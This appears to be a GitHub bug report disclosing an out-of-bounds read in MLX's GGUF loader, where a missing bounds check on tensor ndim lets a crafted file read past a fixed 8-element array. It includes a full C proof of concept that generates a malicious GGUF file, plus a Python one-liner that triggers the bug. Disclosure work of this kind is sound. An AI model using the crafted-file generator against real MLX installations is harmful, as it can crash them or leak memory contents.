-
Notifications
You must be signed in to change notification settings - Fork 1.6k
[BUG] get_shape() has no bounds check allowing read of outside data structure #3358
Description
Describe the bug
-
get_shape() has no bounds check (mlx/io/gguf.cpp:50-57)
for (int i = tensor.ndim - 1; i >= 0; i--) {
shape.push_back(tensor.dim[i]); // no check that ndim <= 8
} -
dim[] is fixed at 8 elements (vendored gguflib.h)
#define GGUF_TENSOR_MAX_DIM 8
uint64_t dim[GGUF_TENSOR_MAX_DIM]; -
The only guard is an assert() (vendored gguflib.c:279)
tensor->ndim = *num_dim;
assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM); // compiled out with NDEBUG -
No NDEBUG override in the build (mlx/io/CMakeLists.txt:9-26) — gguflib is built as a plain static library with no flags to
preserve asserts in release mode. -
Two call sites reach get_shape() with untrusted tensor data:
- mlx/io/gguf.cpp:234 — non-quantized tensor loading
- mlx/io/gguf_quants.cpp:112 — quantized tensor loading
- If you access dim[n] where n >= 8 you read the following data:
typedef struct {
const char *name; // 8 bytes
size_t namelen; // 8 bytes
uint32_t type; // 4 bytes
uint32_t ndim; // 4 bytes
uint64_t dim[8]; // 64 bytes <-- dim[0] through dim[7]
// --- everything below is what dim[8+] reads ---
uint64_t offset; // 8 bytes → dim[8]
uint64_t bsize; // 8 bytes → dim[9]
uint64_t num_weights; // 8 bytes → dim[10]
uint8_t *weights_data; // 8 bytes → dim[11]
// --- past the struct boundary ---
// dim[12..31] → stack frame: local variables, saved registers,
// return address, caller's frame, etc.
} gguf_tensor;
To Reproduce
/*
* POC: GGUF Tensor ndim Stack Out-of-Bounds Read (ADVISORY-2026-001 / V1-002)
*
* Demonstrates two vulnerabilities triggered by a crafted GGUF with ndim > 8:
*
* Part A: Shows that assert() is a no-op in release builds (NDEBUG),
* leaving ndim completely unchecked in gguflib.c.
*
* Part B: Directly demonstrates the OOB read in MLX's get_shape().
* A gguf_tensor is placed on the stack with ndim=32 but only
* dim[0..7] initialized. The get_shape() loop reads dim[8..31],
* which are whatever happens to be adjacent in memory.
*
* Part C: Generates a minimal malicious GGUF file (crash_v1002.gguf)
* that can be loaded with actual MLX to trigger the real bug:
 *           python3 -c "import mlx.core as mx; mx.load('crash_v1002.gguf')"
*
* Build & run:
* cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oob
*
* Optional — build with AddressSanitizer for formal OOB detection:
* cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.c
* ./poc_ndim_oob_asan
*/
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* ===== Replica of gguflib structures (from gguflib.h) ===== */
/* Maximum dimension count gguflib supports; dim[] is fixed at this size. */
#define GGUF_TENSOR_MAX_DIM 8
/* Replica of gguflib's tensor descriptor (vendored gguflib.h). Field order
 * and sizes matter: with ndim > 8, indexing dim[] walks into the trailing
 * members below it, which is exactly the OOB read being demonstrated. */
typedef struct {
    const char *name;    /* tensor name pointer; byte length in namelen */
    size_t namelen;
    uint32_t type;       /* GGUF tensor type id (0 == F32 in Part C) */
    uint32_t ndim;       /* parsed from the file; never clamped to GGUF_TENSOR_MAX_DIM */
    uint64_t dim[GGUF_TENSOR_MAX_DIM]; /* Fixed 8-element array */
    uint64_t offset;       /* aliased as dim[8] by the OOB loop */
    uint64_t bsize;        /* aliased as dim[9] */
    uint64_t num_weights;  /* aliased as dim[10] */
    uint8_t *weights_data; /* aliased as dim[11] */
} gguf_tensor;
/* ===== Part A: Demonstrate assert() is a no-op ===== */
/* Part A: demonstrate that gguflib's only guard on ndim is an assert(),
 * which the preprocessor removes entirely when NDEBUG is defined, so a
 * hostile ndim from a crafted file flows through with no validation. */
static void demo_assert_noop(void) {
    printf("--- Part A: assert() behavior under NDEBUG ---\n\n");

    const uint32_t hostile_ndim = 32; /* value a crafted GGUF can supply */

    /* The exact check from gguflib.c ~line 279:
     *     assert(tensor->ndim <= GGUF_TENSOR_MAX_DIM);
     * Under NDEBUG this expands to nothing at all. */
    assert(hostile_ndim <= GGUF_TENSOR_MAX_DIM);

#ifndef NDEBUG
    /* Assertions are live in this build; with hostile_ndim = 32 the
     * assert above would already have aborted before reaching here. */
    printf("[*] NDEBUG is NOT defined -- assert() is active.\n");
    printf(" Rebuild with -DNDEBUG to simulate release behavior.\n\n");
#else
    printf("[!] NDEBUG is defined -- assert() compiled to nothing.\n");
    printf(" ndim=%u passed through with ZERO validation.\n", hostile_ndim);
    printf(" This is the root cause: gguflib trusts assert() for\n");
    printf(" untrusted input validation.\n\n");
#endif
}
/* ===== Part B: Demonstrate OOB read in get_shape() ===== */
/*
* We place a canary struct right after the tensor on the stack to make
* the OOB read visible. In real MLX, whatever is adjacent on the stack
* (return addresses, saved registers, local variables) gets read instead.
*/
typedef struct {
    gguf_tensor tensor;
    /* Canary words placed after the tensor struct. With ndim = 32, the
     * OOB loop's dim[8..11] alias tensor's own trailing fields (offset,
     * bsize, num_weights, weights_data) and dim[12..31] land inside this
     * array, making the out-of-bounds read visible as a distinct pattern.
     * NOTE(review): this aliasing assumes no padding between members —
     * holds for this layout on common 64-bit ABIs; confirm if ported. */
    uint64_t canary[24];
} stacked_layout;
/* Part B: replicate MLX's get_shape() loop against a tensor whose ndim
 * (32) exceeds the dim[] capacity (8), and print what the out-of-bounds
 * indices actually read from adjacent memory. */
static void demo_get_shape_oob(void) {
    printf("--- Part B: OOB read in get_shape() ---\n\n");

    stacked_layout layout;
    memset(&layout, 0, sizeof(layout));

    /* Initialize the tensor as if gguflib parsed it (but without the
     * OOB write -- we're isolating the get_shape() read side). */
    layout.tensor.ndim = 32; /* Attacker-controlled from GGUF file */

    /* Fill the valid dim[0..7] with recognizable values */
    for (int i = 0; i < GGUF_TENSOR_MAX_DIM; i++) {
        layout.tensor.dim[i] = 100 + i; /* 100, 101, ..., 107 */
    }

    /* Fill canary region with a distinct pattern so we can see the OOB */
    for (int i = 0; i < 24; i++) {
        layout.canary[i] = 0xDEADBEEF00000000ULL | (uint64_t)i;
    }

    /*
     * This is the vulnerable loop from mlx/io/gguf.cpp lines 50-57:
     *
     *   Shape get_shape(const gguf_tensor& tensor) {
     *     Shape shape;
     *     for (int i = tensor.ndim - 1; i >= 0; i--) {
     *       shape.push_back(tensor.dim[i]);
     *     }
     *     return shape;
     *   }
     *
     * Replicated below; the bound is ndim alone, never the array size.
     */
    printf("[*] get_shape() iterates ndim=%u times over dim[%d] array:\n\n",
        layout.tensor.ndim, GGUF_TENSOR_MAX_DIM);
    printf(" %-8s %-20s %s\n", "Index", "Value", "Status");
    printf(" %-8s %-20s %s\n", "-----", "-----", "------");
    for (int i = (int)layout.tensor.ndim - 1; i >= 0; i--) {
        uint64_t val = layout.tensor.dim[i]; /* OOB read when i >= 8 */
        if (i < GGUF_TENSOR_MAX_DIM) {
            printf(" dim[%2d] %-20llu OK (valid element)\n",
                i, (unsigned long long)val);
        } else {
            printf(" dim[%2d] 0x%016llx ** OOB READ — adjacent memory! **\n",
                i, (unsigned long long)val);
        }
    }
    printf("\n[!] The %d lines marked OOB read memory beyond the dim[] array.\n",
        32 - GGUF_TENSOR_MAX_DIM);
    printf(" In real MLX, these would be stack variables, return addresses,\n");
    printf(" or other struct members — an information disclosure or crash.\n\n");
}
/* ===== Part C: Generate a malicious GGUF file ===== */
/* Serialize a 32-bit value into buf[0..3] in little-endian byte order. */
static void write_le32(uint8_t *buf, uint32_t val) {
    for (int shift = 0; shift < 32; shift += 8) {
        *buf++ = (uint8_t)(val >> shift);
    }
}
/* Serialize a 64-bit value into buf[0..7] in little-endian byte order. */
static void write_le64(uint8_t *buf, uint64_t val) {
    size_t i = 0;
    while (i < sizeof val) {
        buf[i++] = (uint8_t)(val & 0xffu);
        val >>= 8;
    }
}
/* ndim written into the crafted file: 4x the dim[] capacity of 8. */
#define MALICIOUS_NDIM 32
/* Name of the single tensor in the generated file. */
#define TENSOR_NAME "weight"
/* Alignment of the tensor-data region. NOTE(review): assumed to be the
 * GGUF default when no "general.alignment" KV is present — confirm
 * against the GGUF spec. */
#define ALIGNMENT 32
/* Part C: write a minimal GGUF v3 file at `path` whose single tensor
 * claims ndim = MALICIOUS_NDIM (32), exceeding GGUF_TENSOR_MAX_DIM (8).
 * Loading it with a vulnerable MLX build triggers the real OOB read in
 * get_shape(). Exits the process on allocation or I/O failure. */
static void generate_gguf(const char *path) {
    printf("--- Part C: Generate malicious GGUF file ---\n\n");

    size_t name_len = strlen(TENSOR_NAME);
    /* magic(4) + version(4) + tensor_count(8) + metadata_kv_count(8) */
    size_t header_size = 4 + 4 + 8 + 8;
    /* name_len(8) + name + ndim(4) + dims(8 each) + type(4) + offset(8) */
    size_t tensor_info_size = 8 + name_len + 4 + (8 * MALICIOUS_NDIM) + 4 + 8;
    size_t info_end = header_size + tensor_info_size;
    /* Tensor data region starts at the next ALIGNMENT boundary. */
    size_t data_start = (info_end + ALIGNMENT - 1) & ~(size_t)(ALIGNMENT - 1);
    size_t total_size = data_start + 4; /* one F32 element */

    uint8_t *buf = (uint8_t *)calloc(1, total_size);
    if (!buf) { perror("calloc"); exit(1); }

    size_t off = 0;
    /* GGUF header (v3) */
    memcpy(buf + off, "GGUF", 4); off += 4;
    write_le32(buf + off, 3); off += 4;
    write_le64(buf + off, 1); off += 8; /* 1 tensor */
    write_le64(buf + off, 0); off += 8; /* 0 metadata KV */
    /* Tensor info: name */
    write_le64(buf + off, name_len); off += 8;
    memcpy(buf + off, TENSOR_NAME, name_len); off += name_len;
    /* Tensor info: ndim = 32 (MALICIOUS — exceeds GGUF_TENSOR_MAX_DIM) */
    write_le32(buf + off, MALICIOUS_NDIM); off += 4;
    /* 32 dimension values (only the first 8 fit in the struct's dim[]) */
    for (uint32_t i = 0; i < MALICIOUS_NDIM; i++) {
        write_le64(buf + off, (i < 8) ? 1 : 0xDEAD0000 + i);
        off += 8;
    }
    /* Tensor type = F32 (0) */
    write_le32(buf + off, 0); off += 4;
    /* Tensor data offset = 0 (relative to the aligned data region) */
    write_le64(buf + off, 0); off += 8;

    /* FIX(review): sanity-check that the layout math matches the bytes
     * actually written — a mismatch would silently corrupt the PoC. */
    if (off != info_end) {
        fprintf(stderr, "internal error: wrote %zu info bytes, expected %zu\n",
            off, info_end);
        free(buf);
        exit(1);
    }

    /* Tensor data: single float 1.0f */
    float one = 1.0f;
    memcpy(buf + data_start, &one, 4);

    FILE *fp = fopen(path, "wb");
    if (!fp) { perror("fopen"); free(buf); exit(1); }
    /* FIX(review): the original ignored the fwrite/fclose results; a
     * short or failed write would silently leave a truncated file. */
    if (fwrite(buf, 1, total_size, fp) != total_size) {
        perror("fwrite");
        fclose(fp);
        free(buf);
        exit(1);
    }
    if (fclose(fp) != 0) { perror("fclose"); free(buf); exit(1); }
    free(buf);

    printf("[+] Written: %s (%zu bytes)\n", path, total_size);
    printf(" Tensor 'weight' has ndim=%d (max valid=%d)\n",
        MALICIOUS_NDIM, GGUF_TENSOR_MAX_DIM);
    printf("\n To trigger in real MLX:\n");
    printf(" python3 -c \"import mlx.core as mx; mx.load('%s')\"\n\n", path);
}
/* ===== Main ===== */
/* Entry point: runs the three demonstrations in order (assert no-op,
 * replicated OOB read, malicious file generation). Always returns 0;
 * a failure inside generate_gguf() exits the process directly. */
int main(void) {
    printf("=========================================================\n");
    printf(" ADVISORY-2026-001 POC: GGUF Tensor ndim OOB Read\n");
    printf(" Affects: MLX <= commit befe42d3\n");
    printf("=========================================================\n\n");
    demo_assert_noop();                /* Part A */
    demo_get_shape_oob();              /* Part B */
    generate_gguf("crash_v1002.gguf"); /* Part C */
    return 0;
}

Compile:

cc -DNDEBUG -O2 -o poc_ndim_oob poc_ndim_oob.c && ./poc_ndim_oob

Optional: build with AddressSanitizer for formal OOB detection:

cc -DNDEBUG -O0 -fsanitize=address -o poc_ndim_oob_asan poc_ndim_oob.c
Run: ./poc_ndim_oob_asan
Reproducible in Python as well:
python3 -c "import mlx.core as mx; mx.load('crash_v1002.gguf')"
Expected behavior
See https://github.com/ggml-org/ggml/blob/master/docs/gguf.md
If you scroll down to `gguf_tensor_info_t`, you will see that, as of today, the number of dimensions should be at most 4 — so a cap of 8 is already generous (unless the GGUF spec changes).
struct gguf_tensor_info_t {
// The name of the tensor. It is a standard GGUF string, with the caveat that
// it must be at most 64 bytes long.
gguf_string_t name;
// The number of dimensions in the tensor.
// Currently at most 4, but this may change in the future.
uint32_t n_dimensions;
// The dimensions of the tensor.
uint64_t dimensions[n_dimensions];
// The type of the tensor.
ggml_type type;
// The offset of the tensor's data in this file in bytes.
//
// This offset is relative to `tensor_data`, not to the start
// of the file, to make it easier for writers to write the file.
// Readers should consider exposing this offset relative to the
// file to make it easier to read the data.
//
// Must be a multiple of `ALIGNMENT`. That is, `align_offset(offset) == offset`.
uint64_t offset;
};

Desktop (please complete the following information):
- OS Version: MacOS 26.3.1 (a) M2 16GB